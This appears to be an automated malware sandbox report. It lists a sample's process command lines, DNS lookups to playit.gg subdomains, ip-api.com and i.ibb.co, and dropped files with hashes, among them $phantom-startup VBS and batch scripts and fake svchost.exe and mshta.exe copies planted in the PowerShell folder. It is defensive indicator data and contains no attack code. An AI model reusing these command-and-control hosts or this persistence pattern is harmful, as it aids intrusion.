"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4800 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4884 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5056 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4140 /prefetch:1
C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5380 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4904 /prefetch:1
C:\Windows\system32\msdt.exe
-modal "197078" -skip TRUE -path "C:\Windows\diagnostics\system\networking" -af "C:\Users\Admin\AppData\Local\Temp\NDFFDA9.tmp" -ep "NetworkDiagnosticsWeb"
C:\Windows\System32\sdiagnhost.exe
C:\Windows\System32\sdiagnhost.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:1
C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" trace diagnose Scenario=NetworkSnapshot Mode=NetTroubleshooter
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNoNetwork -p -s DPS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s WdiServiceHost
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s WdiSystemHost
C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" trace diagnose Scenario=NetworkSnapshot Mode=NetTroubleshooter
C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\ImmersiveControlPanel\SystemSettings.exe
"C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel
C:\Windows\system32\ApplicationFrameHost.exe
C:\Windows\system32\ApplicationFrameHost.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\System32\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\winethc.dll",ForceProxyDetectionOnNextRun
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4888 /prefetch:1
C:\Windows\ImmersiveControlPanel\SystemSettings.exe
"C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel
C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefaultbcd1a1cfhd411h4ae1h9fe3h3354cdb4a53e
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7fffec2046f8,0x7fffec204708,0x7fffec204718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,1430714184297952503,12384781248704128857,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,1430714184297952503,12384781248704128857,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s Netman
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.4.4:53 | google.com | udp |
| US | 8.8.8.8:53 | 4.4.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | 193.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
Files
memory/2652-0-0x00007FFFEFE53000-0x00007FFFEFE55000-memory.dmp
memory/2652-6-0x000001A8E25B0000-0x000001A8E25D2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5tgvqcjs.ab4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2652-11-0x00007FFFEFE50000-0x00007FFFF0911000-memory.dmp
memory/2652-12-0x00007FFFEFE50000-0x00007FFFF0911000-memory.dmp
memory/2652-13-0x000001A8E27C0000-0x000001A8E2804000-memory.dmp
memory/2652-14-0x000001A8E2A30000-0x000001A8E2AA6000-memory.dmp
memory/2652-15-0x000001A8E2600000-0x000001A8E2608000-memory.dmp
memory/2652-16-0x000001A8E2AB0000-0x000001A8E2B8C000-memory.dmp
memory/2736-27-0x00007FFFEFE50000-0x00007FFFF0911000-memory.dmp
memory/2736-28-0x00007FFFEFE50000-0x00007FFFF0911000-memory.dmp
memory/2736-29-0x00007FFFEFE50000-0x00007FFFF0911000-memory.dmp
memory/2736-32-0x00007FFFEFE50000-0x00007FFFF0911000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 661739d384d9dfd807a089721202900b |
| SHA1 | 5b2c5d6a7122b4ce849dc98e79a7713038feac55 |
| SHA256 | 70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf |
| SHA512 | 81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8 |
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_962.vbs
| MD5 | ea54fc2cffa9e8e97b71383f1b5352fa |
| SHA1 | cd694823076fed240ae0377fa748ccc1f537fae9 |
| SHA256 | f73070cc5832787d34a3f77f719bcb59370b7f18f25358fcc39fd64cb96c7f95 |
| SHA512 | 095b4c02ba8a0118e7524a96409f11bf7706d8bba52a6ff688ee0110351d34e737e720f5aa6d36cff8982fc0634175de7beeece43db9457858010a48d094c251 |
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_962.bat
| MD5 | 1897b3980473ad054ab05b0f2ced4de7 |
| SHA1 | a694b444dc8dd30e07f69671c3905ffb6fe13532 |
| SHA256 | 3d25b09ab5a16a6b49a7394175b3bce37ba2ae9ce8771408b05280b1bd14b036 |
| SHA512 | 6f67fe1aca76aa0ff33ebf7f1edc4bae6b25c34c543ffa8f59220e520dea91fe92bd50681a5d3086353ef245bd28887bca93efa276ad2544dfbdbdd188ba5ee1 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 005bc2ef5a9d890fb2297be6a36f01c2 |
| SHA1 | 0c52adee1316c54b0bfdc510c0963196e7ebb430 |
| SHA256 | 342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d |
| SHA512 | f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22 |
memory/2652-50-0x00007FFFEFE50000-0x00007FFFF0911000-memory.dmp
memory/3488-51-0x0000000003270000-0x000000000329A000-memory.dmp
memory/3488-98-0x00007FF7CDFD0000-0x00007FF7CDFE0000-memory.dmp
memory/1372-100-0x00007FF7CDFD0000-0x00007FF7CDFE0000-memory.dmp
memory/1788-110-0x00007FF7CDFD0000-0x00007FF7CDFE0000-memory.dmp
memory/2056-114-0x00007FF7CDFD0000-0x00007FF7CDFE0000-memory.dmp
memory/2056-113-0x00007FFFB67F0000-0x00007FFFB6800000-memory.dmp
memory/1788-109-0x00007FFFB67F0000-0x00007FFFB6800000-memory.dmp
memory/1968-108-0x00007FF7CDFD0000-0x00007FF7CDFE0000-memory.dmp
memory/1968-107-0x00007FFFB67F0000-0x00007FFFB6800000-memory.dmp
memory/1660-106-0x00007FF7CDFD0000-0x00007FF7CDFE0000-memory.dmp
memory/1660-105-0x00007FFFB67F0000-0x00007FFFB6800000-memory.dmp
memory/2560-104-0x00007FF7CDFD0000-0x00007FF7CDFE0000-memory.dmp
memory/2560-103-0x00007FFFB67F0000-0x00007FFFB6800000-memory.dmp
memory/896-102-0x00007FF7CDFD0000-0x00007FF7CDFE0000-memory.dmp
memory/896-101-0x00007FFFB67F0000-0x00007FFFB6800000-memory.dmp
memory/1736-112-0x00007FF7CDFD0000-0x00007FF7CDFE0000-memory.dmp
memory/1736-111-0x00007FFFB67F0000-0x00007FFFB6800000-memory.dmp
memory/1372-99-0x00007FFFB67F0000-0x00007FFFB6800000-memory.dmp
memory/3488-97-0x00007FFFB67F0000-0x00007FFFB6800000-memory.dmp
memory/620-189-0x0000019827810000-0x00000198278B4000-memory.dmp
C:\Windows\System32\WindowsPowerShell\v1.0\hat.exe
| MD5 | e10c7425705b2bd3214fa96247ee21c4 |
| SHA1 | 7603536b97ab6337fa023bafcf80579c2b4059e6 |
| SHA256 | 021068ac225e479b124c33d9e7582c17fdea6e625b165b79e2c818479d8094e4 |
| SHA512 | 47e031992d637fef2a67e4fb08d2d82eaba03eba6b80f3e0e0997153acf0d979d0294276c4a10a97daa50130540230865c56191e6fe8df07dbea11c50fa48a2d |
C:\Windows\System32\WindowsPowerShell\v1.0\mshta.exe
| MD5 | 092a0c6fe885844fd74947e64e7fc11e |
| SHA1 | bfe46f64f36f2e927d862a1a787f146ed2c01219 |
| SHA256 | 91431cb73305e0f1fdc698907301b6d312a350f667c50765615672e7f10a68f2 |
| SHA512 | 022589bd17b46e5486971a59b2517956bb15815266e48dc73a7ae9ac9efd42a348af09df471562eb71ffc94ce1e1845d54ca2994663d1496a385bce50ae595f0 |
C:\Windows\System32\WindowsPowerShell\v1.0\ONPE.exe
| MD5 | 27fe9341167a34f606b800303ac54b1f |
| SHA1 | 86373d218b48361bff1c23ddd08b6ab1803a51d0 |
| SHA256 | 29e13a91af9b0ac77e9b7f8b0c26e5702f46bd8aea0333ca2d191d1d09c70c5d |
| SHA512 | 05b83ad544862d9c0cfc2651b2842624cff59fc4f454e0b1a2b36a705b558fad5a834f9f1af9f2626c57f1e3cd9aa400e290eaafb6efeb680422992bcbbde5b0 |
memory/4996-219-0x0000000000DE0000-0x0000000000DF8000-memory.dmp
memory/4332-225-0x0000000000800000-0x0000000000816000-memory.dmp
C:\Windows\System32\WindowsPowerShell\v1.0\svchost.exe
| MD5 | 1f1b23752df3d29e7604ba52aea85862 |
| SHA1 | bb582c6cf022098b171c4c9c7318a51de29ebcf4 |
| SHA256 | 4834d31394f19d42e8d2a035b4c3c9c36441340ea19fe766396848ecfb608960 |
| SHA512 | d52722ab73bb15d4a5b0033351f98f168192f382677e6d474f6cf506cf8dc2f5e421e45279b6cac0f074857f41a865d87b5d989450bfcb8eba925b7baa12fbde |
memory/2360-237-0x00000000007A0000-0x00000000007BA000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 4158365912175436289496136e7912c2 |
| SHA1 | 813d11f772b1cfe9ceac2bf37f4f741e5e8fbe59 |
| SHA256 | 354de4b033ba6e4d85f94d91230cb8501f62e0a4e302cd4076c7e0ad73bedbd1 |
| SHA512 | 74b4f7b24ad4ea395f3a4cd8dbfae54f112a7c87bce3d286ee5161f6b63d62dfa19bb0d96bb7ed1c6d925f5697a2580c25023d5052c6a09992e6fd9dd49ea82b |
\??\pipe\LOCAL\crashpad_2340_PULPCHEOHDMFVBUS
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | ce4c898f8fc7601e2fbc252fdadb5115 |
| SHA1 | 01bf06badc5da353e539c7c07527d30dccc55a91 |
| SHA256 | bce2dfaa91f0d44e977e0f79c60e64954a7b9dc828b0e30fbaa67dbe82f750aa |
| SHA512 | 80fff4c722c8d3e69ec4f09510779b7e3518ae60725d2d36903e606a27ec1eaedbdbfac5b662bf2c19194c572ccf0125445f22a907b329ad256e6c00b9cf032c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 24a1b8cbcd8c68c91c2cdedec7989966 |
| SHA1 | 2d65b0266699c1ba4f0cc0cb2b3a71c1031b9de0 |
| SHA256 | 5cafbd0285d32183dc26dd3c6b2cd1abecb2394aeed9343622cabefe8ebdb79c |
| SHA512 | b489719003c6d2956dc4ef7a8355747abbb05900d8e903f5e4c76f98acdf38f3421bc10fe96e2a684830c74d8958004245e2dc61a5a3631786ce4fafc4a202f5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 206702161f94c5cd39fadd03f4014d98 |
